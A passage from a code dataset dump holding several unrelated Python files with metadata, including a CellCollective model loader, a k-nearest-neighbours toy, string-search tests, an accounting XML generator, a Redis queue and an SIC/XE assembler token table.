max(Bubble_series)])\n#plt.show()\nplt.savefig('hw3_mt.png')\n","sub_path":"hw3/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"484967348","text":"import tf2_ros\nimport rospy\n\nrospy.init_node(\"hi\")\nbuf = tf2_ros.Buffer()\ntf = tf2_ros.TransformListener(buf) \n\nfromFrame = \"left_hand_3\"\ntoFrame = \"right_hand_3\"\n\nbuf.lookup_transform(fromFrame, toFrame, rospy.Time.now())","sub_path":"testTF.py","file_name":"testTF.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"509304791","text":"\nimport re\n\nfrom urllib.parse import urlparse\n\nfrom xml.dom import *\nfrom xml.dom.minidom import parse\n\nfrom bs4 import BeautifulSoup\n\nfrom colomoto_jupyter import *\n\nif IN_IPYTHON:\n from IPython.display import Markdown\n\nurlidentifier = re.compile(\"https?://[^/]*\\\\bcellcollective\\.org/#(\\\\d+)\\\\b\")\n\ndef id_from_url(url):\n uri = urlparse(url)\n if uri.netloc:\n if uri.scheme == \"cellcollective\":\n return uri.netloc\n urlmatch = urlidentifier.search(url)\n if urlmatch:\n return urlmatch.group(1)\n\ndef url_matches(url):\n return id_from_url(url) is not None\n\nclass CellCollectiveConnector(object):\n def __init__(self, identifier):\n self.id = id_from_url(identifier) or identifier\n @property\n def sbml_url(self):\n return \"http://api.cellcollective.org/model/export/{}?type=SBML\".format(self.id)\n @property\n def sbml_basename(self):\n return \"{}.sbml\".format(self.id)\n\ndef connect(identifier):\n return CellCollectiveConnector(identifier)\n\n\nMETADATA_UNITPROTID = \"UniProtID\"\nMETADATA_GENENAME = \"GeneName\"\nMETADATA_NCBIGENEID = \"NCBIGeneID\"\n\nQUALNS = \"http://www.sbml.org/sbml/level3/version1/qual/version1\"\n\nclass CellCollectiveSBMLModel(object):\n def __init__(self, localfile):\n self.localfile = localfile\n self.dom = parse(localfile)\n self.root = self.dom.documentElement\n species_elts = self.root.getElementsByTagNameNS(QUALNS, \"qualitativeSpecies\")\n self.id2elt = dict([(e.getAttributeNS(QUALNS, \"id\"), e) \\\n for e in species_elts])\n self.name2id = dict([(e.getAttributeNS(QUALNS, \"name\"), id) \\\n for id, e in self.id2elt.items()])\n\n @property\n def species(self):\n \"\"\"\n Returns the set of defined species\n\n :rtype: set\n \"\"\"\n return set(self.name2id.keys())\n\n _key2metadata = {\n \"uniprotid\": METADATA_UNITPROTID,\n \"uniprotaccessionid\": METADATA_UNITPROTID,\n \"genename\": METADATA_GENENAME,\n \"ncbigeneid\": METADATA_NCBIGENEID,\n }\n\n def species_metadata(self, name):\n metadata = {}\n notes = self.id2elt[self.name2id[name]].getElementsByTagName(\"notes\")\n bodies = notes[0].getElementsByTagName(\"body\") if notes else None\n ps = bodies[0].getElementsByTagName(\"p\") if bodies else None\n if not ps:\n return metadata\n htmldata = BeautifulSoup(ps[0].firstChild.wholeText, \"html.parser\")\n divs = htmldata.find_all(\"div\")\n for div in divs:\n t = div.getText().split(\":\")\n if len(t) == 2:\n key = t[0].strip().replace(\" \",\"\").lower()\n value = t[1].strip()\n if key in self._key2metadata:\n metadata[self._key2metadata[key]] = value\n return metadata\n\n def species_uniprotkb(self, name):\n uniprotid = self.species_metadata(name).get(METADATA_UNITPROTID)\n if not uniprotid:\n return\n return URL(\"https://www.uniprot.org/uniprot/%s\" % uniprotid)\n\n def species_ncbi_gene(self, name):\n id = self.species_metadata(name).get(METADATA_NCBIGENEID)\n if not id:\n return\n return URL(\"https://www.ncbi.nlm.nih.gov/gene/%s\" % id)\n\n\n\ndef load(identifier):\n conn = None\n if isinstance(identifier, CellCollectiveConnector):\n conn = identifier\n elif url_matches(identifier):\n conn = CellCollectiveConnector(identifier)\n else:\n sbmlfile = identifier\n if conn:\n from colomoto_jupyter.io import download\n url = conn.sbml_url\n bname = conn.sbml_basename\n sbmlfile = download(url, suffix=bname)\n return CellCollectiveSBMLModel(sbmlfile)\n\ndef to_biolqm(model):\n biolqm = import_colomoto_tool(\"biolqm\")\n return biolqm.load(model.localfile)\n\n","sub_path":"cellcollective.py","file_name":"cellcollective.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"297844018","text":"from keras_seg import preprocessing\nimport numpy as np\n\n\nclass MicroscopyPreprocessor(preprocessing.Preprocessor):\n\n def __init__(self, backbone=None):\n super().__init__(\n backbone=backbone,\n img_preprocesses=[\n preprocessing.convert_16_bit_to_8_bit,\n preprocessing.make_3d_grayscale,\n ],\n augmentations=[\n preprocessing.augmentations.get_rigid_augmentation(),\n preprocessing.augmentations.get_non_spatial_augmentation()\n ]\n )\n\n def prep_images_and_masks_for_cell_segmentation(self, images, masks):\n return self.preprocess_batch(images), self.preprocess_masks(masks)\n\n def prep_images_and_masks_for_fluo_segmentation(self, cell_images, fluo_images, masks):\n images = np.stack([cell_images, fluo_images, fluo_images], axis=-1)\n return self.preprocess_batch(images), self.preprocess_masks(masks)\n\n","sub_path":"MicroAnalyzer/MicroscopyPreprocessor.py","file_name":"MicroscopyPreprocessor.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634657491","text":"import math\nimport numpy as np\ndef formula(l,x):\n p1 = 0\n for i in range(len(l)-1):\n p1 = p1 + ((l[i] - x[i]) ** 2)\n # print(l[i],x[i], p1)\n squad = math.sqrt(p1)\n return squad\n\ndef ordena(base, dis):\n cop = sorted(dis)\n nova = []\n # print(cop)\n # print(dis)\n for i in range(len(cop)):\n for j in range(len(dis)):\n if cop[i] == dis[j]:\n # print(\"{}x{}-{}\\t\\t{}\".format(i,j,cop[i],base[j][3]))\n nova.append(base[j])\n\n # print(\"\\n\\n\")\n # for i in range(len(nova)):\n # print(base[i], nova[i])\n return nova\n\ndef calcula_distancia(base,x):\n d = []\n for i in range(len(base)):\n aux = formula(base[i], x)\n d.append(aux)\n # print(d)\n return d\n # baseordena(base,d)\n\ndef ff(f,i):\n # if i == 0:\n # return\n # print(f)\n A,B = 0,0\n for j in range(i):\n if f[j][3] == 'A':\n A += 1\n else:\n B += 1\n # print(\"\\n\")\n\n if A == B:\n return '?'\n elif A > B:\n return 'A'\n else:\n return 'B'\n\n\n\ndef frequencia(ord):\n aux = 0\n m = []\n for i in range(len(ord)):\n f = []\n for j in range(i+1):\n f.append(ord[j])\n # print(ord[j])\n aux = i+1\n maior = ff(f,aux)\n m.append(maior)\n # print(m)\n A,B = 0,0\n for i in range(len(m)):\n if m[i] == 'A':\n A += 1\n else:\n B += 1\n if A == B:\n return '?'\n elif A > B:\n return 'A'\n else:\n return 'B'\n\n\n\ndef main():\n base = [\n [3,7,8,'A'],\n [3,2,9,'A'],\n [0,1,1,'B'],\n [4,1,2,'A'],\n [1,3,7,'B'],\n [1,1,1,'B'],\n ]\n x = [3,7,7]\n distancia = calcula_distancia(base,x)\n ordenado = ordena(base, distancia)\n freq = frequencia(ordenado)\n # for i in range(len(ordenado)):\n # print(base[i], ordenado[i])\n print(\"a classe encontrada foi {}\".format(freq))\n return\n\nmain()\n","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549243780","text":"import json\nfrom urllib.request import urlopen\n\n\ndef returnComic(number = None):\n url = ''\n if number == None:\n url = 'http://xkcd.com/info.0.json'\n else :\n url = 'http://xkcd.com/' + number + '/info.0.json'\n result = urlopen(url).read().decode('utf8')\n data = json.loads(result)\n return data['safe_title'] + \"\\n\" + data['img'] + \"\\nAlt text: \" + data['alt']\n ","sub_path":"FlaskWebProject/xkcdScript.py","file_name":"xkcdScript.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"211837347","text":"import unittest\n\nfrom protocat.search import RobinKarpSearcher\n\n\nclass TestRobinKarp(unittest.TestCase):\n\n def test_single_pattern_multiple_match(self):\n\n text = 'Random example'\n pattern = 'example'\n\n offset = text.index(pattern)\n limit = offset + len(pattern)\n\n matches = RobinKarpSearcher(['example']).process(text)\n\n self.assertEqual(len(matches), 1)\n self.assertEqual((offset, limit), matches[0])\n\n def test_single_pattern_no_match(self):\n\n text = 'Random example'\n pattern = 'no match'\n\n search_matches = RobinKarpSearcher([pattern]).process(text)\n\n self.assertEqual(len(search_matches), 0)\n\n def test_single_pattern_multiple_match(self):\n \n text = 'Random example for an example'\n pattern = 'example'\n\n matches = [\n (text.index(pattern), text.index(pattern) + len(pattern)),\n (text.rindex(pattern), text.rindex(pattern) + len(pattern)),\n ]\n\n search_matches = RobinKarpSearcher(['example']).process(text)\n\n self.assertEqual(len(search_matches), 2)\n\n self.assertTrue(matches[0] in search_matches)\n self.assertTrue(matches[1] in search_matches)\n\n def test_multiple_pattern_single_pattern_match(self):\n \n text = 'Random example for an example'\n patterns = ['example', 'no match']\n\n matches = [\n (text.index(patterns[0]), text.index(patterns[0]) + len(patterns[0])),\n (text.rindex(patterns[0]), text.rindex(patterns[0]) + len(patterns[0])),\n ]\n\n search_matches = RobinKarpSearcher(patterns).process(text)\n\n self.assertTrue(len(search_matches), 2)\n self.assertTrue(matches[0] in search_matches)\n self.assertTrue(matches[1] in search_matches)\n\n def test_multiple_pattern_no_match(self):\n pass\n\n def test_multiple_pattern_multiple_match(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"protocat_tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284605855","text":"# -*- coding: utf-8 -*-\ntry:\n from xlrd import open_workbook\n import xml.etree.cElementTree as ET\n from xml.dom import minidom\nexcept ImportError:\n pass\n\nxl_workbook = open_workbook('arsredovisning-2017-09-30.xlsx')\n\nresultatrakning = xl_workbook.sheet_by_index(2)\nbalansrakning = xl_workbook.sheet_by_index(4)\n\nr_element_name = 8\nr_title = 10\n# ~ r_saldo = 13\nr_documentation = 16\nr_account_type = 50\nr_element_nix = []\nr_main_type = [\n 'RorelsensIntakterLagerforandringarMmAbstract',\n 'RorelsekostnaderAbstract',\n 'FinansiellaPosterAbstract',\n 'BokslutsdispositionerAbstract',\n 'SkatterAbstract',\n]\n\nb_element_name = 9\nb_title = 11\n# ~ b_saldo = 14\nb_documentation = 17\nb_account_type = 43\nb_element_nix = [\n 'ImmateriellaAnlaggningstillgangar',\n 'MateriellaAnlaggningstillgangar',\n 'FinansiellaAnlaggningstillgangar',\n 'VarulagerMm',\n 'KortfristigaFordringar',\n 'KortfristigaPlaceringar',\n 'ObeskattadeReserver',\n 'LangfristigaSkulder',\n 'KortfristigaSkulder',\n]\nb_main_type = [\n 'TillgangarAbstract',\n 'EgetKapitalSkulderAbstract',\n]\n\nr_lst = []\nb_lst = []\n\n# key: element_name\n# value: external_id\nexternal_id_exchange_dict = {\n 'Kundfordringar': 'account.data_account_type_receivable',\n 'Leverantorsskulder': 'account.data_account_type_payable',\n 'KassaBankExklRedovisningsmedel': 'account.data_account_type_liquidity',\n 'CheckrakningskreditKortfristig': 'account.data_account_type_credit_card',\n 'OvrigaFordringarKortfristiga': 'account.data_account_type_current_assets',\n 'KoncessionerPatentLicenserVarumarkenLiknandeRattigheter': 'account.data_account_type_non_current_assets',\n 'ForskottFranKunder': 'account.data_account_type_prepayments',\n 'MaskinerAndraTekniskaAnlaggningar': 'account.data_account_type_fixed_assets',\n 'OvrigaKortfristigaSkulder': 'account.data_account_type_current_liabilities',\n 'OvrigaLangfristigaSkulderKreditinstitut': 'account.data_account_type_non_current_liabilities',\n 'Aktiekapital': 'account.data_account_type_equity',\n 'AretsResultat': 'account.data_unaffected_earnings',\n 'OvrigaRorelseintakter': 'account.data_account_type_other_income',\n 'Nettoomsattning': 'account.data_account_type_revenue',\n 'AvskrivningarNedskrivningarMateriellaImmateriellaAnlaggningstillgangar': 'account.data_account_type_depreciation',\n 'OvrigaRorelsekostnader': 'account.data_account_type_expenses',\n 'HandelsvarorKostnader': 'account.data_account_type_direct_costs',\n}\n\ndef get_account_range(sheet, account_type, row):\n account_range = []\n col = account_type\n while (sheet.cell(row, col).value == 'BAS-konto'):\n account_range.append(sheet.cell(row, col+1).value)\n col += 8\n return account_range\n\ndef get_range_domain(number_list):\n code_list = []\n for number in number_list:\n if 'x' in number:\n if '-' in number:\n code_list += [str(i) for i in range(int(number.split('-')[0].replace('x', '0')), int(number.split('-')[1].replace('x', '9'))+1)]\n else:\n code_list += [str(i) for i in range(int(number.replace('x', '0')), int(number.replace('x', '9'))+1)]\n else:\n if '-' in number:\n code_list += [str(i) for i in range(int(number.split('-')[0]), int(number.split('-')[1])+1)]\n else:\n code_list += [number]\n return [('code', 'in', code_list)]\n\ndef get_type(lst):\n if '1930' in lst:\n return 'liquidity'\n elif '2440' in lst:\n return 'payable'\n elif '1510' in lst:\n return 'receivable'\n else:\n return 'other'\n\ndef read_sheet(sheet=None, element_name=0, title=0, documentation=0, account_type=0, main_type=[] ,report_type='', nix=[], lst=None):\n mtype = ''\n for row in range(1, sheet.nrows):\n if sheet.cell(row, account_type).value == 'BFNAR':\n pass\n # ~ lst.append({\n # ~ 'name': sheet.cell(row, title).value,\n # ~ 'type': 'sum',\n # ~ 'element_name': sheet.cell(row, element_name).value,\n # ~ 'belong': sheet.cell(row, belong).value,\n # ~ 'data_type': sheet.cell(row, data_type).value,\n # ~ 'note': sheet.cell(row, documentation).value,\n # ~ })\n if sheet.cell(row, account_type).value == 'BFNAR' and sheet.cell(row, element_name).value in main_type:\n mtype = sheet.cell(row, element_name).value\n if sheet.cell(row, account_type).value == 'BAS-konto' and sheet.cell(row, element_name).value not in nix:\n if sheet.cell(row, element_name).value == 'OvrigaKortfristigaSkulder':\n account_type += 16\n domain = get_range_domain(get_account_range(sheet, account_type, row))\n lst.append({\n 'name': sheet.cell(row, title).value,\n 'type': get_type(domain[0][2]),\n 'element_name': sheet.cell(row, element_name).value,\n 'note': sheet.cell(row, documentation).value,\n 'account_range': domain,\n 'main_type': mtype,\n 'report_type': report_type,\n })\n\nread_sheet(resultatrakning, r_element_name, r_title, r_documentation, r_account_type, r_main_type, 'r', r_element_nix, r_lst)\nread_sheet(balansrakning, b_element_name, b_title, b_documentation, b_account_type, b_main_type, 'b', b_element_nix, b_lst)\n\ndef print_xml(sheet_list):\n def parse_xml(sheet_list):\n odoo = ET.Element('odoo')\n data = ET.SubElement(odoo, 'data')\n for lst in sheet_list:\n for l in lst:\n external_id = external_id_exchange_dict.get(l.get('element_name'), 'type_%s' %l.get('element_name'))\n record = ET.SubElement(data, 'record', id=external_id, model=\"account.account.type\")\n field_name = ET.SubElement(record, \"field\", name=\"name\").text = l.get('name')\n field_element_name = ET.SubElement(record, \"field\", name=\"element_name\").text = l.get('element_name')\n field_type = ET.SubElement(record, \"field\", name=\"type\").text = l.get('type')\n field_main_type = ET.SubElement(record, \"field\", name=\"main_type\").text = l.get('main_type')\n field_report_type = ET.SubElement(record, \"field\", name=\"report_type\").text = l.get('report_type')\n field_account_range = ET.SubElement(record, \"field\", name=\"account_range\").text = str(l.get('account_range'))\n field_note = ET.SubElement(record, \"field\", name=\"note\").text = l.get('note')\n ET.SubElement(data, 'function', name='_change_name', model=\"account.account.type\")\n return odoo\n xml = minidom.parseString(ET.tostring(parse_xml(sheet_list))).toprettyxml(indent=\" \")\n xml = xml.replace('', '')\n with open(\"../data/account_account_type.xml\", \"w\") as f:\n f.write(xml.encode('utf-8'))\n\nprint_xml([r_lst, b_lst])\n\n# ~ # Test script\n# ~ print \"\"\"\n# ~ \n # ~ \n# ~ \"\"\"\n\n# ~ for r in r_lst:\n # ~ print \"\"\" \n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ \n # ~ \"\"\" %(r.get('element_name'), r.get('name'), r.get('type'), r.get('element_name'), r.get('main_type'), r.get('report_type'), r.get('account_range'), r.get('note'))\n\n# ~ for b in b_lst:\n # ~ print \"\"\" \n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ \n # ~ \"\"\" %(b.get('element_name'), b.get('name'), b.get('type'), b.get('element_name'), b.get('main_type'), b.get('report_type'), b.get('account_range'), b.get('note'))\n\n# ~ print \"\"\" \n# ~ \n# ~ \"\"\"\n","sub_path":"l10n_se_mis/bin/create_account_account_type_data.py","file_name":"create_account_account_type_data.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"183363952","text":"#-------------------------------------------------------------------------------\n# Name: entry_buffer\n# Purpose: Extends deque() in order to store the entry that we need to analyze\n# but offers several others functionalities\n#\n# Author: Rudy\n#\n# Created: 30/11/2013\n#-------------------------------------------------------------------------------\n\nfrom collections import deque, Counter\nfrom .log_entry import LogEntry\nfrom .alert_state import AlertState\n\nclass EntryBuffer(deque):\n\n def __init__(self,watchPeriod=2):\n super().__init__()\n self.popularities=Counter()\n self.statuses=Counter()\n self.watchPeriod=watchPeriod\n self.alert=AlertState()\n\n\n def addNewEntry(self,unparsedEntry):\n \"\"\"\n Parse the entry to convert it to an Entry object\n Add it to the buffer and update the stats\n @param unparsedEntry: Line of the log file\n \"\"\"\n newEntry=LogEntry(unparsedEntry)\n self.popularities[newEntry.section]+=1\n self.statuses[newEntry.status]+=1\n self.append(newEntry)\n\n\n def emptyOldEntries(self,now):\n \"\"\"\n Remove the entry that are older than the period (watchPeriod) we need\n @param now:Epoch of the moment where we read this entry ~right now\n \"\"\"\n while len(self)!=0 and now-self.watchPeriod*60>self[0].epoch:\n toDel=self.popleft()\n self.popularities[toDel.section]-=1\n self.statuses[toDel.status]-=1\n\n\n def updateAlert(self):\n \"\"\"\n Update the alert with the latest state and return a message to display\n if a change in the alert state happened\n \"\"\"\n return self.alert.update(len(self))\n\n\n def getMostPopular(self):\n \"\"\"\n Returns the section of the site with the most hits during the last 2 min\n \"\"\"\n if len(self)!=0:\n popular=self.popularities.most_common(1)[0]\n return popular[0], popular[1], len(self)\n else:\n return None,None,None\n\n\n def getStatusRepartition(self):\n \"\"\"\n Returns the number of request that had a Success, Client Error and\n Server Error status during the last 2 min\n Redirection and Information are not considered because they are arbitrarily\n juged less important, perhaps wrongfully\n \"\"\"\n okStatuses=0\n serverFaultStatuses=0\n clientFaultStatuses=0\n for key in self.statuses:\n if key.startswith(\"2\"):\n okStatuses+=self.statuses[key]\n elif key.startswith(\"4\"):\n clientFaultStatuses+=self.statuses[key]\n elif key.startswith(\"5\"):\n serverFaultStatuses+=self.statuses[key]\n return okStatuses, clientFaultStatuses, serverFaultStatuses\n\n\n\n def getAlertStatus(self):\n \"\"\"\n Returns the status of the Traffic monitoring\n \"\"\"\n return self.alert.status()\n\n\n\n\n\n\n\n","sub_path":"log_monitor/entry_buffer.py","file_name":"entry_buffer.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"272590738","text":"#-*- coding: UTF-8 -*-\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport os\ncurrentUrl = os.path.dirname(__file__)\nparentUrl = os.path.abspath(os.path.join(currentUrl, os.pardir))\nsys.path.append(parentUrl)\nimport redis\nfrom settings import RedisHost\n\n\nclass RedisQueue(object):\n \"\"\"Simple Queue with Redis Backend\"\"\"\n def __init__(self, namespace, name ):\n \"\"\"The default connection parameters are: host='localhost', port=6379, db=0\"\"\"\n self.__db= redis.from_url(\"redis://{}:{}/{}\".format(RedisHost['host'],\n RedisHost['port'],\n RedisHost['db']))\n self.key = '%s:%s' %(namespace, name)\n\n def qsize(self):\n \"\"\"Return the approximate size of the queue.\"\"\"\n return self.__db.llen(self.key)\n\n def empty(self):\n \"\"\"Return True if the queue is empty, False otherwise.\"\"\"\n return self.qsize() == 0\n\n def put(self, item, namespace=\"\"):\n \"\"\"Put item into the queue.\"\"\"\n nam = self.key if namespace == \"\" else namespace\n self.__db.rpush(nam, item)\n\n def get(self, block=True, timeout=None, namespace=\"\"):\n \"\"\"Remove and return an item from the queue.\n\n If optional args block is true and timeout is None (the default), block\n\n if necessary until an item is available.\"\"\"\n\n nam = self.key if namespace == \"\" else namespace\n if block:\n item = self.__db.blpop(nam, timeout=timeout)\n else:\n item = self.__db.lpop(nam)\n\n if item:\n item = item[1]\n return item\n\n def get_nowait(self):\n \"\"\"Equivalent to get(False).\"\"\"\n return self.get(block=False)","sub_path":"middles/middleWare/fakeQueue.py","file_name":"fakeQueue.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"159220331","text":"from nltk.tokenize.regexp import RegexpTokenizer\nfrom InstTable import *\nfrom LiteralTable import *\nfrom SymbolTable import *\nfrom TokenTable import *\nfrom Token import *\n\"\"\"\n * 사용자가 작성한 프로그램 코드를 단어별로 분할 한 후, 의미를 분석하고, 최종 코드로 변환하는 과정을 총괄하는 클래스이다.
\n * pass2에서 object code로 변환하는 과정은 혼자 해결할 수 없고 symbolTable과 instTable의 정보가 필요하므로 이를 링크시킨다.
\n * section 마다 인스턴스가 하나씩 할당된다.\n *\n\"\"\"\n\n\nclass TokenTable:\n locCount = 0 #클래스변수선언\n \"\"\"\n * 초기화하면서 symTable과 literalTable과 instTable을 링크시킨다.\n * @param symTab : 해당 section과 연결되어있는 symbol table\n * @param literalTab : 해당 section과 연결되어있는 literal table\n * @param instTab : instruction 명세가 정의된 instTable\n \"\"\"\n def __init__(self, symT, literalT, instT):\n # Token을 다룰 때 필요한 테이블들을 링크시킨다.\n self.symTab = symT\n self.literalTab = literalT\n self.instTab = instT\n self.literCheck = [] # String\n TokenTable.locCount = 0 # init\n # 각 line을 의미별로 분할하고 분석하는 공간.\n self.tokenList = [] # tokenList 생성\n\n \"\"\" 전역변수 \"\"\"\n MAX_OPERAND = 3\n\n\n # bit 조작의 가독성을 위한 선언 (static)\n nFlag = 32\n iFlag = 16\n xFlag = 8\n bFlag = 4\n pFlag = 2\n eFlag = 1\n\n '''\n * 일반 문자열을 받아서 Token단위로 분리시켜 tokenList에 추가한다.\n * @param line : 분리되지 않은 일반 문자열\n '''\n\n def putToken(self, line):\n tok = Token()\n tok.parsing(line)\n tok.setLocation(TokenTable.locCount)\n self.tokenList.append(tok)\n\n # 해당 라인의 토큰파싱이 끝나고 Symbol이 있으면 추가해주기\n if tok.label != \".\" and tok.label != \" \" and tok.label != \"\":\n self.symTab.putSymbol(tok.label, tok.location)\n\n # 해당 라인의 토큰파싱이 끝나고 literal이 있으면 추가해주기\n if len(tok.operand) > 0 and tok.operand[0] != \"\" and tok.operand[0].find('=') != -1 :\n self.literalTab.putLiteral(tok.operand[0], tok.location)\n self.literCheck.append(tok.operand[0])\n\n # 해당 라인의 토큰파싱이 끝나고 nixbpe 설정해주기\n if self.instTab.searchOpcode(tok.operator) > 0 or tok.operator == \"LDA\":\n if self.instTab.searchFormat(tok.operator) < 3:\n tok.nixbpe = 0\n # format이 3이상인 것만 nixbpe 셋팅\n else:\n # n, i flag 설정\n if tok.operand[0][0] == '#':\n tok.setFlag(self.nFlag, 0)\n tok.setFlag(self.iFlag, 1)\n elif tok.operand[0][0] == '@':\n tok.setFlag(self.nFlag, 1)\n tok.setFlag(self.iFlag, 0)\n else:\n tok.setFlag(self.nFlag, 1)\n tok.setFlag(self.iFlag, 1)\n\n # x flag 설정\n if len(tok.operand) > 1 and tok.operand[1].find(\"X\") != -1:\n tok.setFlag(self.xFlag, 1)\n else:\n tok.setFlag(self.xFlag, 0)\n\n # p flag 설정\n if tok.operand[0][0] != '#' and tok.operator[0] != '+' and tok.operator != \"RSUB\":\n tok.setFlag(self.pFlag, 1)\n else:\n tok.setFlag(self.pFlag, 0)\n\n # e flag 설정\n if tok.operator[0] == '+':\n tok.setFlag(self.eFlag, 1)\n else:\n tok.setFlag(self.eFlag, 0)\n\n # print(tok.operator + \" \" + tok.operand[1] + \" \" + Integer.toHexString(tok.nixbpe))\n\n # 해당 라인의 토큰파싱이 끝나고 operator를 확인해서 locCount 값 계산해주기\n locationlen = self.calcLocation(tok)\n if locationlen > 0:\n TokenTable.locCount += locationlen\n\n def calcLocation(self, token):\n len = self.instTab.searchFormat(token.operator)\n if len > 0:\n return len\n else:\n if token.operator == \"RESW\" or token.operator == \"WORD\":\n len = 3\n\n elif token.operator == \"RESB\":\n len = int(token.operand[0])\n\n\n elif token.operator == \"BYTE\":\n len = 1\n\n\n elif token.operator == \"LTORG\":\n len = self.literalTab.literalCount\n self.literalTab.setLiteralCount(0)\n count = 0\n for litCheck in self.literCheck:\n if litCheck[1:2] == 'C' :\n len = 3\n else :\n len = 1\n self.literalTab.modifyLiteral(litCheck, TokenTable.locCount + (count * len))\n count += 1\n\n elif token.operator == \"END\":\n len = self.literalTab.literalCount\n self.literalTab.setLiteralCount(0)\n count = 0\n for litCheck in self.literCheck:\n self.literalTab.modifyLiteral(litCheck, token.location)\n count += 1\n\n elif token.operator == \"EQU\":\n if token.operand[0] == \"*\":\n len = 0\n\n else:\n\n tokenizer = RegexpTokenizer(\"-\", gaps=True)\n tokens = tokenizer.tokenize(token.operand[0])\n\n value1 = self.symTab.search(tokens[0])\n value2 = self.symTab.search(tokens[1])\n len = value1 - value2\n self.symTab.modifySymbol(token.label, len)\n len = 0\n\n else:\n len = -1\n\n return len\n\n def printTokenList(self):\n for t in self.tokenList:\n print(format(int(t.location), 'X') + \"\\t\" + t.label + \"\\t\" + t.operator + \"\\t\" + t.operand[0])\n\n '''\n * tokenList에서 index에 해당하는 Token을 리턴한다.\n * @param index\n * @return : index번호에 해당하는 코드를 분석한 Token 클래스\n '''\n\n def getToken(self, index):\n return self.tokenList[index]\n\n def setBytes(self, index, num):\n self.tokenList[index].setByteSize(num)\n\n def setObjcode(self, index, objCode):\n self.tokenList[index].setObjectCode(objCode)\n\n \"\"\"\n * Pass2 과정에서 사용한다.\n * instruction table, symbol table literal table 등을 참조하여 objectcode를 생성하고, 이를 저장한다.\n * @param index\n \"\"\"\n\n def makeObjectCode(self, index):\n\n resultOb = \"\"\n\n if self.instTab.searchFormat(self.getToken(index).operator) == 2:\n self.setBytes(index, 4)\n opcode = self.instTab.searchOpcode(self.getToken(index).operator)\n opcodeStr = \"%X\" % opcode\n resultOb += opcodeStr\n\n for i in self.getToken(index).operand :\n if i == \"X\":\n resultOb += \"1\"\n elif i == \"A\":\n resultOb += \"0\"\n elif i == \"S\":\n resultOb += \"4\"\n else: # T인 경우\n resultOb += \"5\"\n\n if len(resultOb) < self.getToken(index).byteSize:\n resultOb += \"0\"\n\n self.setObjcode(index, resultOb)\n\n elif self.instTab.searchFormat(self.getToken(index).operator) == 3:\n self.setBytes(index, 6)\n disA = 0\n opcode = self.instTab.searchOpcode(self.getToken(index).operator)\n oprand = self.getToken(index).operand[0]\n\n if oprand[0] == '@':\n oprand = oprand[1:]\n\n elif oprand[0] == '#':\n disA = int(oprand[1:])\n\n elif oprand[0] == '=':\n TA = self.literalTab.search(oprand)\n PA = self.getToken(index + 1).location\n disA = TA - PA\n\n else:\n TA = self.symTab.search(oprand)\n PA = self.getToken(index + 1).location\n disA = TA - PA\n\n # object code 앞부분 처리\n calcObjCode = opcode * 16 + self.getToken(index).nixbpe\n if len(\"%X\" % calcObjCode) < 3:\n resultOb += \"0\"\n resultOb += \"%X\" % calcObjCode\n\n # object code 뒷부분 처리\n if opcode == 76: # RSUB 처리\n resultOb += \"000\"\n\n elif disA < 0: # 음수인 경우\n str = hex((disA + (1 << 16)) % (1 << 16))\n str = str[-3:] # 뒤에서 3글자만 가져오도록 함\n resultOb += str.upper()\n\n elif len(\"%X\" % disA) < 3:\n str = \"0\" * (3 - len(\"%X\" % disA))\n resultOb += str\n resultOb += \"%X\" % disA\n\n\n else:\n print(\"disA error\")\n\n self.setObjcode(index, resultOb)\n\n\n elif self.instTab.searchFormat(self.getToken(index).operator) == 4:\n self.setBytes(index, 8)\n disA = \"00000\"\n opcode = self.instTab.searchOpcode(self.getToken(index).operator)\n\n # object code 앞부분 처리\n calcObjCode = opcode * 16 + self.getToken(index).nixbpe\n if opcode == 0: # LDA일 때, 예외처리\n resultOb += \"0\"\n resultOb += \"%X\" % calcObjCode\n\n # object code 뒷부분 처리\n resultOb += disA\n\n self.setObjcode(index, resultOb)\n\n\n elif self.getToken(index).operator == \"LTORG\" or self.getToken(index).operator == \"END\":\n resultOb += self.literalTab.getlitAscii(self.getToken(index).location)\n self.setBytes(index, len(resultOb))\n self.setObjcode(index, resultOb)\n\n\n elif self.getToken(index).operator == \"BYTE\":\n resultOb += self.getToken(index).operand[0][2:4]\n self.setBytes(index, 2)\n self.setObjcode(index, resultOb)\n\n\n elif self.getToken(index).operator == \"WORD\":\n resultOb += \"000000\"\n self.setBytes(index, 6)\n self.setObjcode(index, resultOb)\n\n # test print\n #print('%d\\t%s\\t%s' % (index, self.getToken(index).operator, self.getToken(index).objectCode))\n\n \"\"\"\n * index번호에 해당하는 object code를 리턴한다.\n * @param index\n * @return : object code\n \"\"\"\n\n def getObjectCode(self, index):\n return 